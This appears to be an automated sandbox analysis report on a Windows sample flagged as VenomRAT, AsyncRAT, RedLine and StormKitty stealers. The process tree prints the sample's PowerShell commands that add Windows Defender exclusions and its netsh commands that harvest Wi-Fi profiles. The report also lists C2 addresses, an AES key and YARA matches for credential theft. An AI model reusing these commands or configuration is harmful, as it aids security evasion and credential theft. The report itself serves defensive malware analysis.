Edit tour

Windows Analysis Report
VzhY4BcvBH.exe

Overview

General Information

Sample name:	VzhY4BcvBH.exe renamed because original name is a hash value
Original sample name:	1D3961A5C49F14F107E4CEE038D45FD0.exe
Analysis ID:	1563741
MD5:	1d3961a5c49f14f107e4cee038d45fd0
SHA1:	beebd3db77e5a5b91336447791a8a0abcbed9ad6
SHA256:	edf2ccaca8d236e6cb3ba9e98c9171c52a23545489bcd756cd47b2eb11baeaba
Tags:	exeVenomRATuser-abuse_ch
Infos:

Detection

AsyncRAT, RedLine, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected AsyncRAT

Yara detected BrowserPasswordDump

Yara detected RedLine Stealer

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Connects to many ports of the same IP (likely port scanning)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with benign system names

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses netsh to modify the Windows network and firewall settings

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

VzhY4BcvBH.exe (PID: 2608 cmdline: "C:\Users\user\Desktop\VzhY4BcvBH.exe" MD5: 1D3961A5C49F14F107E4CEE038D45FD0)

powershell.exe (PID: 6180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\system32.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

system32.exe (PID: 5560 cmdline: "C:\Users\user\AppData\Roaming\system32.exe" MD5: 4F872C2AC85FB6A67DE72BD0A6D2724F)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 5004 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 50D960B16FFE409FD2D7F3EE2D4FD603)

cmd.exe (PID: 4956 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 3228 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

findstr.exe (PID: 1992 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 2284 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5516 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

netsh.exe (PID: 7032 cmdline: netsh wlan show networks mode=bssid MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: VenomRAT

{"Server": "212.87.215.19", "Port": "1602", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "MutexName": "xtqapdqeqwwlkdcvcat", "Autorun": "false", "Group": "false"}

Threatname: AsyncRAT

{"Server": "212.87.215.19", "Ports": "1602", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "AdAsra9KWXPe1YjHD16oql7ML46APrSS", "Mutex": "xtqapdqeqwwlkdcvcat", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "a25OqTbzkOXasU77CSOC87QNxJIQZMKhBFjEl9h42mhrUFbh5/mOMWZQEnwmryHp46QvSMtP5Kfo/5azQtYRPyNO2cXQYghW14RfBpDVeX6CedrKJoaDXzAHw9K6OGdPBlnun9EZYqHGgqiDTWKXQRaU1DXQ36b4TETwWsr7pAY=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Threatname: RedLine

{"C2 url": ["212.87.215.19:37552"], "Bot Id": "kek"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\system32.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\system32.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Roaming\system32.exe	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
C:\Users\user\AppData\Roaming\system32.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
C:\Users\user\AppData\Roaming\svchost.exe	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
C:\Users\user\AppData\Roaming\svchost.exe	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf890:$q1: Select * from Win32_CacheMemory 0xf8d0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf91e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf96c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2291428611.00000000036A2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000005.00000000.2134627480.0000000000872000.00000002.00000001.01000000.00000008.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.2306003026.00000000131A1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x141aa:$a4: get_ScannedWallets 0x13008:$a5: get_ScanTelegram 0x13e2e:$a6: get_ScanGeckoBrowsersPaths 0x11c4a:$a7: <Processes>k__BackingField 0xfb5c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1157e:$a9: <ScanFTP>k__BackingField
00000000.00000002.2291428611.0000000003183000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000A.00000000.2259349303.0000000000162000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4478728762.0000000002601000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xf9a24:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0000000A.00000002.4522944409.000000001D540000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x96fb5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x97027:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x970b1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x97143:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x971ad:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9721f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x972b5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x97345:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000A.00000002.4528103199.000000001D860000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
Process Memory Space: VzhY4BcvBH.exe PID: 2608	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: VzhY4BcvBH.exe PID: 2608	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: VzhY4BcvBH.exe PID: 2608	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: VzhY4BcvBH.exe PID: 2608	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x46f2:$a4: get_ScannedWallets 0x3219f:$a4: get_ScannedWallets 0x3599:$a5: get_ScanTelegram 0x31046:$a5: get_ScanTelegram 0x437b:$a6: get_ScanGeckoBrowsersPaths 0x31e28:$a6: get_ScanGeckoBrowsersPaths 0x222c:$a7: <Processes>k__BackingField 0x2fcd9:$a7: <Processes>k__BackingField 0x2d20c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1b60:$a9: <ScanFTP>k__BackingField 0x2f60d:$a9: <ScanFTP>k__BackingField
Process Memory Space: system32.exe PID: 5560	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: system32.exe PID: 5560	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: system32.exe PID: 5560	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1015d3:$a4: get_ScannedWallets 0x10047a:$a5: get_ScanTelegram 0x10125c:$a6: get_ScanGeckoBrowsersPaths 0xff10d:$a7: <Processes>k__BackingField 0xfc640:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xfea41:$a9: <ScanFTP>k__BackingField
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: svchost.exe PID: 5004	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: svchost.exe PID: 5004	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xc9957:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 27 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.system32.exe.870000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.0.system32.exe.870000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
5.0.system32.exe.870000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
5.0.system32.exe.870000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.VzhY4BcvBH.exe.131a1be0.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VzhY4BcvBH.exe.131a1be0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.VzhY4BcvBH.exe.131a1be0.2.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
0.2.VzhY4BcvBH.exe.131a1be0.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
0.2.VzhY4BcvBH.exe.31d6f70.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.VzhY4BcvBH.exe.31d6f70.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda90:$q1: Select * from Win32_CacheMemory 0xdad0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xdb1e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdb6c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
0.2.VzhY4BcvBH.exe.131a1be0.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
10.0.svchost.exe.160000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
10.0.svchost.exe.160000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf890:$q1: Select * from Win32_CacheMemory 0xf8d0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf91e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf96c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
10.2.svchost.exe.1d860000.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.1d860000.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
10.2.svchost.exe.1d860000.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
10.2.svchost.exe.1d860000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.1d860000.9.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x123771:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
10.2.svchost.exe.1d860000.9.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x129a0b:$s1: \VPN\NordVPN 0x1299f1:$s2: \VPN\OpenVPN 0x1299d3:$s3: \VPN\ProtonVPN
0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.VzhY4BcvBH.exe.31d6f70.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf890:$q1: Select * from Win32_CacheMemory 0xf8d0:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf91e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf96c:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
10.2.svchost.exe.1d540000.7.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
10.2.svchost.exe.1d540000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.svchost.exe.1d540000.7.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
